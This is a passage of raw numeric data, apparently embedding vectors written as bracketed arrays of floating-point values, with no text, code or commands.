2,-0.007278536,-0.0014366922,0.0030586477,0.018367322,0.003604291,-0.0028604278,0.0076165767,0.026017046,0.0007314025],[-0.0054442273,0.002207724,-0.027182583,-0.009683501,0.0070364703,-0.009741132,0.011542713,0.02011122,-0.0039158193,-0.016381914,-0.00038365507,0.02861173,-0.0032336605,-0.0045727533,-0.017275512,0.012810127,0.008829214,0.00584883,-0.00092466414,0.000242455,0.013381372,-0.012641133,0.017107956,-0.01674223,0.016619908,-0.0033975607,0.02444553,0.005357251,0.008925265,0.0040267385,-0.018202687,0.020782886,0.021425894,0.01399965,0.029439641,-0.012037045,-0.016665809,-0.025103938,-0.0006658062,-0.013279338,-0.0083934795,0.02292979,-0.0042558983,0.039849974,-0.009174129,-0.0021768156,-0.017058372,0.01380139,-0.0064916145,0.00026209146,0.017138807,0.000104859966,-0.035387766,0.019992646,-0.0065348838,0.020971257,0.0059772264,-0.017398523,-0.00401888,-0.012207386,0.00093055464,0.009420816,-0.005270944,-0.018716542,0.026015826,0.0037450886,-0.0014852977,-0.026267912,0.007327796,-0.02924055,0.001652019,-0.0027402185,0.00030557622,-0.0073830485,0.025918724,0.0104916245,-0.0021260527,-0.008625036,-0.014658638,-0.0048990464,-0.005310014,-0.007637953,-0.009051364,0.00893315,0.008752729,-0.0134169925,-0.0073124897,-0.007942182,-0.0018781563,-0.015452212,0.00075826526,0.0077754143,0.0122542,-0.0037928533,-0.008655357,0.008886498,0.014918838,-0.024314806,-0.0008987118,0.014309429,-0.0028532466,-0.012231136,-0.028347082,0.014515716,0.008442347,-0.017120728,0.005327002,-0.03060246,0.002770724,-0.0181444,0.0071152383,0.0032978712,0.0031690774,-0.0006586253,-0.00865621,-0.01968851,0.019145822,0.014061086,0.0022274486,0.011343501,-0.017397014,0.039566092,0.018963426,-0.00817823,-0.003141428,-0.0003009568,-0.004273962,0.004143084,0.0032497328,-0.00505985,-0.0032958763,0.019088054,0.0032116948,-0.014644649,0.028105127,0.0019275605,0.013864077,-0.009878161,-0.021587053,-0.02635307,0.01795324,-0.008222123,0.008202908,-0.0052856733,0.022221085,0.020840235,-0.0037500777,0.026413316,0.016383793,-0.020861931,0.017214557,0.009166234,-0.015431647,-0.019966416,0.008077289,0.029764151,0.021747697,-0.0020879759,-0.038804144,-0.007313044,-0.0121998675,-0.00034520234,-0.0033958,-0.01763992,-0.026653223,-0.024607066,-0.010108537,-0.005286431,-0.0039571687,0.005537985,0.026345938,0.032629713,0.015472658,0.0044243354,0.021662507,0.023986459,0.00795356,-0.012295349,-0.0056841085,0.0023620839,0.007362174,0.018917024,-0.016385237,-0.0049227183,-0.0003294708,0.038864054,0.01080817,-0.016966883,-0.016447695,-0.016166776,0.010018263,-0.026146747,0.000083118706,0.008272699,-0.00780478,-0.025889192,-0.015897822,0.061480924,-0.00006814694,0.0057347626,-0.028981442,-0.011684057,0.01618345,-0.027581893,0.0012480402,-0.00094821537,-0.018516049,-0.0068617286,0.028229201,-0.005758631,0.010823205,-0.0064534284,-0.0150224455,0.0069383066,0.006774308,-0.07713462,0.014189394,0.022208096,-0.0017726413,0.0021814285,-0.018880945,0.005494438,-0.00043462348,-0.015443414,-0.000612248,0.0085706,-0.000049433285,0.006043621,0.010546925,-0.0072416915,0.006700428,0.014373495,-0.034410153,-0.023287566,-0.0013441134,-0.0011160679,0.012319246,-0.0029806702,0.016786829,-0.012156421,-0.0069561205,-0.008410998,0.04031917,0.023219695,-0.00319256,0.0096467165,0.012348672,0.014285014,-0.020169921,0.009954318,-0.0031569453,-0.018258829,0.009171046,0.014226474,-0.00673467,-0.0123270545,0.02164404,-0.027430085,-0.006563962,0.014264883,0.005987187,0.023394866,-0.029443972,0.035216622,0.024969025,0.009579368,0.009606594,-0.040346164,-0.009283051,-0.009524212,-0.006410826,0.018676884,-0.01145573,-0.005502602,0.00006486765,-0.020135341,0.0021240439,0.014696657,0.028061664,-0.002220434,-0.005068446,0.00059100724,0.009474434,-0.015872158,0.007215522,0.0060822405,-0.004541631,-0.001994738,0.027880846,-0.007448605,-0.0027298892,-0.017904827,0.017215014,-0.003007957,-0.015690442,-0.006583279,-0.017782934,0.012723012,0.012922848,-0.014915928,-0.013382363,0.008137181,0.020141615,-0.011320507,-0.015398522,-0.01080717,-0.002081738,0.0372103,-0.004258901,0.018880615,-0.041996624,0.007143419,-0.005377214,-0.013083037,0.012857891,0.0017967874,-0.0013093877,-0.009358655,-0.006397929,-0.0040520607,0.025312701,-0.01611139,0.021297337,-0.02367513,0.0004606494,0.0028266676,0.0009213911,-0.015202949,0.014856391,-0.018528106,-0.032390434,0.009360152,0.017084297,0.025026986,-0.016025484,0.02016221,-0.0026701028,0.028941996,0.010398637,-0.0062622568,-0.027556816,0.005535108,0.004905076,0.008956099,-0.003471406,-0.0025116047,-0.0068163937,-0.0074938987,0.013270577,0.0010915488,0.001477216,-0.017367197,-0.014634985,-0.030843304,-0.016089411,-0.015222023,-0.01283658,-0.002576917,0.01926772,-0.017056996,0.019656768,-0.0049235113,-0.001577815,0.014093832,0.06868963,-0.004882428,-0.005249377,-0.000523006,-0.016389582,-0.012858016,0.010081589,0.0038094094,-0.0021582088,0.015229391,-0.010424117,-0.0123749,0.001964508,-0.004648579,-0.021513078,0.012889647,-0.029254006,-0.012481302,-0.019633153,-0.012756555,0.030050121,-0.023526616,0.030349655,0.00927904,0.013558758,0.015006444,-0.0029175023,-0.005544659,-0.01313704,-0.028622773,0.0013770652,-0.013159436,0.008300062,0.025336055,-0.032085814,0.01985515,0.007281295,-0.0092956675,-0.023349129,-0.016069578,0.0017940403,0.009446487,-0.0066228337,-0.028393373,-0.010446042,0.038268544,-0.0039287666,-0.0032822962,-0.004857559,0.016477307,0.013845246,0.024706487,-0.023018792,0.021667825,0.0054425197,0.0072856336,0.016232,-0.03588429,0.04800667,0.041073043,0.0023356625,0.033111624,0.0030015789,-0.0037727547,0.0060594776,0.019368662,-0.008937706,-0.01786489,0.0052018175,0.005744205,0.005110723,0.006612733,-0.01086182,0.017754473,0.0033343944,0.013350411,-0.001595827,-0.009654042,0.0016525923,0.028130453,-0.013641478,0.00659449,0.011582246,-0.0050978507,0.0050716526,-0.008708482,0.0063916147,0.0019923479,0.0074914186,0.0024228152,-0.0020591926,0.002840082,-0.0016629987,0.010427737,0.024642782,0.02219682,0.00082840695,0.023789972,-0.011329346,0.018119091,0.010849729,0.0019953146,-0.018390082,-0.025835535,-0.023072114,0.008314711,0.020214254,-0.007523957,-0.0003826977,0.039912656,-0.03202823,0.0011928967,0.01746209,-0.023782412,-0.0073944563,-0.037794,-0.006221656,-0.006657336,0.0003255481,-0.016090348,0.017680729,-0.000028559392,0.0010571145,0.021798426,0.007321372,0.009897948,-0.0131477555,-0.00411873,0.011787214,0.013658068,0.014883099,0.020487022,0.019281592,-0.031300675,0.021880537,-0.00037642376,-0.015568155,-0.037038963,0.0073199943,-0.0039861295,0.011993833,0.020157412,0.03924477,-0.01604883,0.010390176,0.015540343,0.045208033,-0.0034058567,-0.017893981,-0.0055238376,-0.0034217092,-0.0067284964,-0.0011772484,-0.00206495,-0.0017719724,-0.0010576114,0.030970471,-0.01342951,-0.0049329097,-0.009828214,0.030491931,-0.026089584,0.01511712,-0.0074835327,-0.016215242,0.025420573,-0.00703291,0.045231804,-0.01785105,-0.012786725,-0.013114537,-0.008242523,0.007574945,-0.02019848,0.008983324,-0.039068554,0.010053934,0.0014119096,0.037453495,0.0047146976,0.009279704,-0.0066023967,-0.016383782,0.014571691,0.0073362216,-0.014708053,0.009337494,0.017951243,0.0008673889,-0.0067284084,-0.01880376,0.0027101617,0.021121893,0.017106593,0.003746926,-0.014466721,-0.019445665,-0.015285132,-0.0070207515,0.019683782,-0.0026725056,0.0029262374,0.004417512,0.01584853,-0.011102226,-0.003062509,0.033808444,-0.010959222,-0.0076262895,0.0074187675,0.02978022,0.023569217,0.0015648069,0.005108596,0.01863869,0.013556866,-0.0073640523,0.014476562,0.004376417,0.017117878,0.024053622,-0.020845627,-0.0011796507,0.013045703,0.0122543955,-0.008056874,-0.0040128883,-0.0088656405,-0.02293798,-0.030350927,-0.021262072,-0.010943997,-0.0066978163,0.0041618445,-0.015211501,0.00041199283,-0.00012736183,-0.012610049,0.022336712,0.0017404275,-0.018795686,0.004442386,0.017085504,-0.017043862,0.015149967,0.018157111,-0.010220952,-0.015594498,0.01547443,-0.0045581427,0.0031195048,0.019228933,0.00517185,0.0017789175,0.0076145814,-0.0057443753,-0.018313354,0.0138926385,-0.011155059,0.0021629224,0.012337155,0.022878584,0.019642735,0.00082018896,-0.013809331,-0.004009152,0.000024413475,-0.03230364,0.00044216387,-0.031052722,0.037419695,-0.013438545,0.0015091709,0.011339989,0.0035037384,-0.011158529,-0.011381768,0.02657563,-0.05279325,-0.01437458,-0.0042082374,0.010378819,-0.0012573102,0.031055545,0.004361731,0.005357984,0.0037819366,-0.009579877,-0.0050811195,0.00084897346,-0.002003753,0.00014309133,0.017000169,0.009714293,-0.04391948,0.0024369773,-0.012303378,-0.030720778,-0.014754667,0.03324245,0.010976201,0.0039822618,0.0015788728,0.015860489,0.00029736263,-0.010668027,0.007680383,-0.042519897,0.013126348,0.016294822,-0.020229904,0.015793338,0.015692554,-0.0021228555,-0.012305851,-0.0356905,0.0040373006,0.01038207,0.019473944,-0.03148766,-0.015748968,0.016670357,-0.014527295,0.019262645,-0.0054958877,0.0035280988,0.015005705,0.04013922,0.018114153,-0.008757408,0.0002338807,0.014391909,-0.008954191,0.008986536,0.014107354,0.023076875,0.0049780593,0.02794348,0.0146218715,0.003012925,-0.004606272,-0.0131143825,0.009298855,0.027820993,0.024595104,0.0037615488,0.021983689,0.012888075,0.010740519,0.008633445,-0.00046960847,-0.00807526,0.027570652,0.0016138484,0.0000536264,0.038627718,-0.012670714,0.023494046,-0.01408052,-0.0078422,-0.014688255,0.030929763,0.02788754,-0.0013605326,0.023077326,-0.0011541195,0.00114797,0.011198315,-0.0054855756,-0.011576486,-0.008454448,-0.019241476,0.0046146233,-0.020022634,-0.0076652495,-0.042363063,0.014767064,0.024029661,0.00530994,-0.0134660555,-0.014852206,-0.026921984,0.012285906,-0.012952579,-0.043220352,-0.018312536,0.012082276,0.026287742,-0.041595537,-0.0074258437,0.014872232,-0.0076527745,0.008083337,0.019658362,-0.009085828,-0.017453194,0.0074740844,-0.019631429,0.025509505,0.01091497,0.022339981,0.005361878,-0.010313304,-0.015602128,-0.0025407777,-0.008278895,-0.00022202871,0.0020856338,-0.009851776,0.016311228,-0.0013939413,-0.022787772,-0.02813396,-0.016999707,0.0073410603,-0.01861077,-0.010847412,-0.0061281915,0.023055758,-0.001997384,0.02980175,-0.01175456,0.028215075,0.024528664,-0.018270293,0.0060737594,-0.009867809,0.0060819937,0.03529395,0.028053584,-0.0034099887,-0.023237435,-0.015702602,-0.00096813065,-0.0064521884,0.020410907,0.0272208,-0.011468788,-0.0152764935,-0.028661469,0.008532139,-0.025494862,0.0073070545,0.00072917005,-0.02700331,0.034784842,-0.0070505794,0.007193788,0.025700364,0.0006090334,-0.0054626474,0.0076971236,0.0193025,-0.026702665,-0.03175027,0.013028604,-0.013684917,0.023073873,0.03147031,-0.029269177,-0.0272753,-0.024514418,0.0070535457,-0.009454711,0.007342482,-0.016570907,-0.022427496,-0.020191645,0.012700215,0.011986868,0.006838134,-0.016278796,-0.009553124,-0.019465543,0.0020498524,-0.0054582236,0.029740758,-0.03351874,0.046123404,-0.0023939468,-0.01790898,0.0130206905,0.0038743385,0.010247115,-0.028122328,0.0049166037,0.015293938,-0.017311608,0.024023276,-0.021440053,-0.008037716,0.023958007,0.0017734689,-0.0053522494,-0.0043048444,-0.01483804,-0.02237414,-0.013821521,0.021319697,-0.04425592,0.012725464,0.006222827,-0.008517199,0.013277994,0.009715858,0.025587648,0.0027689089,-0.00844635,0.020689772,-0.0021537181,-0.029803693,-0.012517523,0.00031397725,-0.009557366,-0.0022957306,0.0024563507,0.006936177,0.013006061,0.030477526,0.0033998666,-0.016388508,0.005907308,-0.009186799,-0.0070794513,0.026304986,-0.005361607,-0.014437552,0.01063053,0.0122615,-0.036433555,-0.030161265,0.0024103215,-0.006633935,0.018308982,-0.021018643,-0.0083306795,-0.007146743,-0.0017915862,0.0055489046,-0.011022862,-0.0083472105,-0.0003691963,0.03122442,0.00022760005,-0.009632779,0.0043033604,0.0022565376,-0.009740978,0.012753556,-0.001050748,0.00010649528,0.0045161676,-0.00362154,0.0055773156,0.020313319,-0.0019057676,-0.011424794,-0.002014891,-0.02801608,0.021049757,0.026291694,-0.008280205,-0.0013648624,-0.018043661,-0.024465064,-0.008921466,-0.018198954,0.00035283822,-0.00024625874,0.009493579,0.01025227,-0.0065123644,-0.022113226,-0.033023685,-0.06171943,0.020032596,-0.012926255,-0.022553463,-0.010145787,-0.0015603823,0.01789429,0.020884605,0.03997797,-0.014305415,0.0038261504,0.012916775,-0.004989574,0.009119608,-0.002121036,-0.028571429,-0.011068468,-0.0090240985,0.0023901162,0.016572693,-0.011615436,-0.006963051,0.012637778,-0.008802974,0.028679265,0.009894382,-0.019839343,-0.004407813,-0.0271369,0.011178926,-0.008202361,0.015487423,-0.005427875,-0.0003293413,-0.022542037,-0.02263125,0.0035724007,0.021943977,-0.0129637085,0.0047922246,-0.018277474,-0.024770644,0.0026603003,0.02862301,-0.015783198,-0.009137321,0.010528865,-0.020452436,0.00070985564,-0.01482908,0.021066073,0.0013311085,0.005528735,0.025082521,0.0034968418,0.03030576,0.0062687322,0.007883184,0.035648216,0.0017893515,0.0139784105,-0.004602575,0.017947236,0.00936953,-0.020389322,-0.022036105,-0.00899043,0.03562666,-0.005507846,0.00025479845,-0.033975523,-0.011719496,-0.02531341,-0.002785388,-0.017545043,0.011923839,-0.010736834,-0.0061518475,-0.001341297,-0.013009553,-0.0028946334,0.01699365,-0.03216673,0.0059751817,-0.016803015,-0.017662251,-0.008836631,0.0005625827,0.0057492545,-0.009958701,0.004807663,0.0023248242,-0.0104228705,-0.011252073,0.005723482,0.030695418,-0.009956297,-0.0103969,0.0126986345,-0.004872546,0.030911516,-0.0008117839,-0.005934872,0.02884602,-0.002895868,0.0009594632,0.000024790335,0.0108673135,0.021190498,0.0069771367,-0.005292612,0.017218757,-0.0104298955,0.020199874,0.013048677,-0.005796108,-0.008407998,0.006069205,0.04692525,0.027883483,0.0040687537,0.006273379,0.015391533,-0.017550945,0.016695388,-0.011056981,0.011604034,0.021102356,-0.0042625545,-0.005029547,-0.0014944237,0.0092036165,0.026313968,-0.025798284,0.013831828,0.011854944,0.0102176955,-0.033040207,-0.015513194,0.019002678,-0.024151992,0.0012287189,0.0027197439,0.018235607,0.0023574794,-0.02608773,-0.0047559123,-0.007504082,-0.0001266858,0.010956087,0.0022141137,0.019063821,0.0013114619,0.020539839,-0.0025734552,0.0030521518,-0.0067980266,-0.006979155,0.00036616894,0.016935883,0.0018116479,-0.019544767,0.001114445,0.009231628,-0.0104598,0.00787028,-0.004716385,-0.009711794,-0.011923951,-0.01668556,0.0014938809,0.010739455,0.001438911,0.03362134,0.008658746,-0.031249246,0.036677483,0.01671477,0.008931087,0.0069943354,0.013864544,0.03901726,0.007975934,0.004052609,0.021714553,0.0032852762,-0.0015722641,0.0056684925,-0.008183805,-0.009164253,-0.0016247208,-0.013227439,0.018812621,-0.010526939,-0.026808504,0.02841237,-0.024214732,0.030555833,0.0068088905,0.0033804397,-0.008960533,0.040499114,0.010728632,0.006122816,-0.016135046,0.0108344015,0.018402964,-0.044602294,-0.01679564,-0.011284466,0.00013194905,-0.015723359,-0.0068567735,-0.018371062,-0.016594233,-0.0022060554,-0.0064815287,0.005181258,0.024085369,-0.018743157,0.014551692,0.028753052,0.038527384,0.014320157,-0.000062735795,-0.027418163,0.013663038,0.008141,-0.003227252,-0.0024532275,0.01832166,-0.002643008,0.020990042,0.0416718,-0.029454472,-0.0023146397,-0.015392164,0.0034215124,-0.004254696,-0.016199509,0.0053669186,0.019997476,0.015005455,0.0016095267,-0.020262863,0.028399162,-0.013476589,-0.010193269,-0.0054192855,0.020635648,-0.014780411,-0.0003749995,0.030883497,0.007158919,-0.015839156,0.012433941,-0.030923065,-0.005660398,-0.0064034713,-0.00019698047,-0.027983848,-0.0074013034,-0.011298306,0.013904332,-0.0056888284,0.009718486,-0.012065847,0.013486084,0.027131384,-0.0017088295,-0.0007704549,0.0001060427,-0.011222939,0.006491562,0.0012305299,0.012286069,-0.025075559,-0.00038990116,0.013051366,0.019832857,0.00781422,0.006762111,0.0010948641,-0.050609402,0.008225301,0.009547843,0.0053754514,-0.0141011635,0.02382389,-0.0005028193,-0.006454122,-0.01935383,0.01511961,0.007859929,0.0055054785,0.001944765,-0.028867098,-0.01763807,-0.011937825,-0.004511713,0.08227995,-0.006376698,0.022606747,0.010609293,0.02481688,-0.027654313,0.031098247,0.00032330328,0.016895343,-0.0118266195,-0.019271443,-0.022291278,-0.018594358,-0.0042699026,0.008513161,0.0026855797,-0.002118458,0.0111521585,0.003457746,0.012296651,0.0048234565,-0.008951642,0.0054116654,0.020845672,0.010678755,0.021174595,0.0150013575,-0.020773139,0.0039618537,0.007431555,0.010198222,-0.020979771,0.010112727,0.010144004,0.0060987435,-0.00051572075,0.021648277,-0.012850697,-0.010718971,0.010937975,0.002345059,-0.02487444,0.017365059,0.013548162,0.00045776382,-0.012246427,-0.011889637,-0.013389664,-0.009587675,0.004620612,0.0021608993,-0.0023025281,-0.016077513,-0.001747428,-0.01755274,0.017454188,0.0068527693,0.019080384,0.03417528,-0.0022733472,-0.002638188,-0.005304642,0.0035386584,-0.020952169,-0.008506763,-0.010786101,0.0035542056,-0.024874425,0.014602076,-0.033408284,0.008982756,-0.022457724,-0.0054962216,0.01630005,0.002489017,0.017273227,0.0141813345,-0.021878155,-0.005712061,-0.04612047,-0.009590949,-0.0026849406,0.01915031,0.016806053,-0.02008271,0.0139182145,0.008250721,-0.0021899345,0.047789164,0.02167995,0.026204465,-0.003257677,0.0029172623,0.03928092,0.014816125,0.023411665,-0.0016056267,0.010711157,-0.017227437,0.015009604,-0.011654845,0.0039589033,0.028571364,-0.027845714,0.011304911,-0.0037717435,0.000312716,-0.02493207,-0.0037567895,0.038874432,0.019282874,0.0061223186,-0.0018152526,0.0029142501,0.0021266446,0.0025084682,0.0019848375,-0.004025553,-0.023278559,0.011983381,0.011467704,0.0031778049,-0.01725147,-0.037612975,-0.006775034,0.14902364,-0.0033566044,-0.011635393,0.024335843,-0.010480967,0.024425382,-0.11702129,0.004202721,0.011015821,-0.00464338,-0.004350514,-0.013146367,-0.009452914,0.030791745,-0.0007043037,0.001655293,-0.004634494,-0.004560168,-0.011089326,-0.015012978,-0.01315585,0.022451269,-0.00033839585,0.0033900233,-0.028570026,-0.0047534336,0.0028756484,-0.014278239,-0.00536429,-0.015550717,0.013873893,-0.00027368887,0.017640296,-0.013726299,-0.010235924,0.020707132,0.00567884,-0.0012983077,0.00040746035,-0.01688632,0.016169569,0.004298064,-0.016725294,-0.051522058,-0.14713776,0.010480682,0.029076597,-0.059867647,0.026154714,-0.018359335,-0.0073484755,-0.015350994,0.007945826,-0.009391031,-0.011050563,0.031520616,-0.0013919612,0.006344978,-0.028071867,0.0028689285,0.015492659,-0.0011630385,-0.0032502646,-0.00028634546,0.01945175,-0.0024538946,-0.030380778,-0.0017538157,-0.026101932,-0.006224888,0.0018509842,0.032826092,-0.015882306,0.006280207,-0.0035841505,0.0067242654,-0.018308898,0.00078317366,-0.02007537,-0.019776223,0.005228823,-0.0013822604,-0.008280658,0.008211361,-0.007757575,0.008678843,-0.011343157,0.0035676386,-0.00068904576,0.0052819937,-0.0027659896,0.015818391,0.0066990717,-0.00258655,0.006285455,-0.0004932047,-0.014640762,0.0053604506,-0.004777631,0.0016780876,0.0040790928,-0.015681926,-0.00677692,0.001063828,-0.0030925495,-0.009893722,-0.015718441,-0.00028849152,0.036998346,0.010479297,0.024032898,-0.021625703,-0.0022009544,0.0010681634,0.0049710902,0.00568773,-0.008485218,-0.017144047,0.034079693,0.004711493,-0.0077306884,0.0077740317,0.013846125,-0.014213804,0.0023444789,0.0066854768,0.004636464,-0.04334372,0.024503808,-0.016670574,0.0038117692,0.019534644,-0.020973166,-0.0055626095,0.026413146,-0.024092933,0.010974584,0.0013470633,0.013829401,-0.006344066,0.050917722,-0.0033162315,-0.012194189,-0.0055973344,0.010473266,-0.029168366,-0.006543146,-0.0065691406,0.0028902718,0.001963594,-0.0047060386,-0.008644864,-0.016957207,0.0043649636,-0.0118604675,-0.0062305178,0.024972018,-0.010661992,-0.024382388,-0.029768618,0.010960313,-0.0046557263,0.00508602,-0.010265661,-0.0258108,0.0073808017,0.0005575237,0.022644877,0.049606405,0.024937095,-0.023657037,-0.009881062,-0.004483568,0.012854953,-0.044457342,0.014065568,-0.016878994,-0.016569963,-0.010167609,0.003468399,-0.01008913,0.012227206,-0.028265439,-0.008533368,-0.0072366577,-0.0003189146,-0.002530262,-0.005551373,0.018381685,-0.036926545,0.033581313,-0.015909713,0.02334639,-0.003369593,-0.01104026,0.021722693,-0.016180782,-0.047972474,0.0069593866,0.07387637,-0.0053130933,-0.0036142094,0.009828679,0.012442638,0.012902364,0.018731639,0.003980989,-0.024914809,-0.024362795,-0.03338094,-0.006605647,-0.005827129,0.009481297,-0.021641161,0.0044550677,0.031973828,-0.0028602364,-0.0055179372,0.009033048,0.018565709,-0.023001816,-0.004861083,0.03472449,0.004851672,0.0036190196,0.01741211,0.00044104308,0.005295963,-0.00005135387,0.0058465237,-0.019526709,-0.01883778,0.0012834817,-0.0031523805,-0.031062562,-0.0062980764,-0.011334621,-0.0013633484,-0.025318759,-0.00090301124,0.009772759,0.014067599,-0.016339831,-0.013003654,-0.023613958,-0.017648302,-0.0038607032,-0.0007395611,-0.016698746,-0.0040770634,0.0033461645,-0.00042134372,-0.0032495607,0.01984201,-0.00014178167,-0.018867875,-0.00083006726,-0.0021319187,-0.007955648,0.019837482,-0.036227833,-0.021364076,-0.00778093,-0.0038747264,0.01782364,-0.0045325435,-0.00361766,0.002519842,0.014407338,-0.019117996,-0.016550016,-0.02877457,0.015570059,0.0055823913,-0.0038646844,-0.013059096,0.0075206757,0.00071118696,0.037433688,-0.008476011,0.01830583,-0.0044729677,-0.011284308,0.0018254513,-0.049368434,-0.017286088,0.04776006,0.003645853,0.0075564906,0.014452798,0.0069839973,0.034481734,-0.0017862475,0.019037064,0.008785316,0.018899303,0.010728214,0.013511704,-0.0228832,0.015770035,0.012398399,0.019879382,-0.022995915,-0.01038096,-0.010180237,-0.0071394094,0.011219146,0.01878134,-0.000009760009,0.002967935,-0.023630252,0.0033070457,-0.025917342,-0.016993778,0.0414259,-0.0009597543,0.009334982,0.032228626,-0.006181885,-0.014065276,0.0151635595,0.0189762,-0.016791498,0.033682127,-0.027349466,0.019236786,0.015229881,-0.02584801,0.022757761,-0.0022911606,0.033665415,0.0112424325,0.0025708664,0.018639563,0.000082504186,0.02430091,0.021109153,0.016619803,0.009984439,-0.024073403,-0.0070757642,0.003743813,0.004327288,-0.010118709,0.002874858,-0.003030032,-0.005655064,-0.013321033,0.00051021704,-0.0061979154,0.021938622,-0.015407515,-0.0029850146,0.020850005,0.016392097,0.007699204,-0.009686326,-0.013083747,0.002178012,0.0016702622,0.039037403,-0.0042990637,-0.0029239894,-0.009441712,0.02606668,0.03945156,-0.0043597193,0.026414955,0.0019884973,-0.0041395305,-0.0070091034,-0.002248868,-0.007331962,0.008578614,-0.009323011,-0.002520514,0.0054576024,-0.01863954,-0.033103876,0.015275454,0.022301968,-0.009144376,-0.0028842823,-0.023200901,0.006102767,0.0011624811,0.027334502,-0.013823441,0.025007494,-0.004983929,0.002229024,-0.016604338,0.0034221117,-0.026421962,-0.014867587,0.0061350744,-0.03662421,0.0010016492,-0.00084008725,0.01215039,0.018527532,-0.010970169,0.0021146315,0.016512038,0.0025093877,-0.010789086,-0.026458375,0.002510399,-0.00996332,-0.023137564,0.0036004125,-0.014975394,0.0045212726,-0.0012321648,-0.026388612,0.006885825,0.022079188,0.017180128,-0.033584356,0.013131613,-0.011964073,0.008773647,0.0037587092,-0.0045907544,-0.011100384,-0.03384163,0.013454675,-0.02342234,-0.0045214635,-0.009081899,0.037670653,0.0033428941,0.0028045834,0.00074987445,-0.014040903,-0.017932685,-0.013185922,-0.03745306,0.004013825,0.009833409,-0.017633436,-0.017576851,0.009913383,-0.0050913347,-0.009667585,0.0064852065,0.00061310246,-0.0114872,0.027930753,0.00956762,0.00042825504,-0.0370618,-0.011210888,0.019851377,-0.033175208,0.01462652,0.0310843,-0.003927404,-0.01606287,-0.011739869,-0.03530878,-0.007219148,-2.0094159e-7,-0.0012747376,-0.0027109822,0.007688959,0.026791353,0.0054801605,-0.011322702,0.00741162,0.00025854283,-0.025847958,0.00026639007,0.00077168236,-0.0072051752,0.017527523,-0.026002904,0.00825922,0.042473912,-0.0059062205,-0.009185287,0.013330808,0.019725373,-0.0081916,-0.008652819,0.009243316,-0.0013860058,-0.004511564,-0.028794745,-0.019893864,0.01979706,0.01723163,-0.016460624,-0.012551776,0.015288752,0.005950161,-0.010713609,0.005816499,-0.0032824094,0.01954854,0.012881886,-0.0066377237,0.006266786,0.006233092,0.0058221784,0.0038008182,0.00494971,0.0008000074,-0.013591692,-0.013781186,0.0015938935,0.029896518,-0.0044540456,0.022268686,0.0018947311,0.0145696895,0.03577231,0.003932174,0.019442461,-0.0011458277,-0.0065475428,-0.0037020259,-0.016671645,-0.034631673,0.008376566,-0.022328151,-0.013265235,-0.01886788,-0.01391667,-0.0015730122,-0.025874706,0.0023808447,-0.08892254,0.005705221,0.007852702,-0.0053903996,-0.01721378,-0.019469973,0.015643775,0.020487698,-0.010205513,-0.033271547,-0.010457646,0.010299634,0.027934931,-0.0062623885,-0.007876808,0.014041087,-0.023566106,-0.009506994,-0.015680408,0.022076363,0.02845441,-0.024104826,0.0069103725,-0.0034545807,0.017725304,-0.0017993344,0.017988745,0.01200921,0.0072766524,0.009473169,-0.00280974,0.005219059,0.012403005,0.014189809,-0.00032215507,0.014499308,-0.00086742215,0.0023706479,0.0020400535,-0.0040153083,-0.0008573504,0.0037846556,0.030656012,-0.0024660064,0.028500907,0.008603326,0.0026680203,0.015406728,0.015467627,0.03316822,-0.02199845,0.0030936569,0.0067953,-0.021857575,-0.013627865,-0.049180347,0.0039652493,-0.018107943,-0.00033519388,0.00433559,-0.020523712,-0.0028721273,0.010120561,0.002761565,0.0121151535,-0.0006490078,0.008241505,0.0040695863,-0.030942101,-0.003178711,-0.008997842,0.013000792,-0.0013486529,0.012414837,-0.005997032,0.00057064876,0.0058119292,-0.006184286,-0.015469282,0.0033155072,-0.01882643,-0.012481644,-0.000017133902,0.036674175,0.0034606613,-0.017449036,-0.0072188424,0.016298467,0.0025142531,0.008156665,-0.0005116027,0.017968686,0.005148645,-0.020458167,-0.01056253,0.009400329,-0.009158785,0.00904386,-0.006356602,-0.011690006,-0.00037040113,0.0040157023,0.0038944778,-0.028581891,-0.120776914,-0.010810575,0.028759852,-0.01010304,0.002504918,0.007925475,0.021464521,0.010178842,0.034443557,0.011568383,-0.01909567,0.023641722,-0.02707766,0.002981318,-0.00073318114,-0.02156924,-0.026843218,-0.00067306793,0.020252421,-0.00771527,-0.015229636,-0.016663559,0.010759868,0.015537811,0.0057111075,0.009820571,0.023823526,0.03057415,0.037911303,-0.015928283,0.0021900255,0.008045874,-0.012183118,0.017777525,-0.03790636,0.007841566,0.0048048603,-0.014885681,0.010283979,0.015819594,0.012665074,0.0066565536,0.012876881,0.023762865,-0.008235491,-0.017505469,-0.00513061,0.014950916,-0.0030984923,-0.009897939,0.013371107,-0.0074736713,-0.0040614284,0.010420224,-0.02236656,0.0050501106,-0.006236249,0.031590756,0.028506655,0.0086793,0.00038910581,-0.003710866,-0.015625313,0.0016378968,0.0013793553,0.005152063,0.0026090564,0.0074434755,0.004914725,0.009774981,0.004510438,0.015240344,0.025469908,-0.007850256,0.026364077,0.00015604582,0.015463777,0.029376155,0.014702735,0.005758138,0.011316766,-0.0034773482,-0.014357151,0.02133107,-0.032797504,0.018273605,-0.0036197945,0.011629243,-0.0054271324,0.013750063,0.015240771,0.01786151,-0.0014798823,0.00812485,0.014281126,0.007728918,0.0743964,0.012127359,-0.003023636,-0.026460158,-0.012342635,0.0053928737,-0.0028960048,0.0138240885,-0.030173212,0.021318613,0.024418257,-0.002797211,0.017989993,-0.0025574437,0.0066016163,0.031691216,-0.014354361,0.008654698,0.013934528,0.0038196573,-0.010530795,-0.007456001,-0.010659661,0.002022836,0.010691573,0.016411273,-0.011223263,-0.031996794,0.01268033,-0.009793444,-0.023928111,0.032590363,-0.0068338416,-0.026172522,0.0055027097,0.0049294406,0.012411175,-0.00027727644,-0.00043771506,0.015431649,-0.014212263,-0.0006811362,0.0008344417,-0.0006040778,-0.003545134,-0.0027649137,-0.00023170367,0.0021253524,0.0068301926,0.011753995,-0.006779441,-0.007836484,-0.009322576,0.015462994,0.0026645262,-0.016292026,0.011903741,-0.013136921,-0.0026389912,-0.00058388844,-0.023523489,0.014204722,0.00873949,0.01838522,-0.012923879,0.038749762,0.009462246,0.0021271734,0.0018236069,-0.0010676472,-0.014718797,0.0013517945,-0.0033484292,0.0034925812,-0.011196666,-0.0031111934,0.008091205,-0.065049514,0.004797343,0.015169356,-0.0024041375,0.018273572,0.03570286,0.021986559,-0.016633203,0.005294795,-0.0167405,-0.0033168276,0.009818318,0.015210733,-0.01682903,0.0038021868,-0.007322968,0.009001932,0.050992843,0.010374434,-0.02835137,-0.03303309,-0.005200419,-0.011394828,0.0016127856,0.020931616,0.0042057964,-0.014068468,-0.014599806,0.011776527,0.01004234,-0.02548228,0.015634434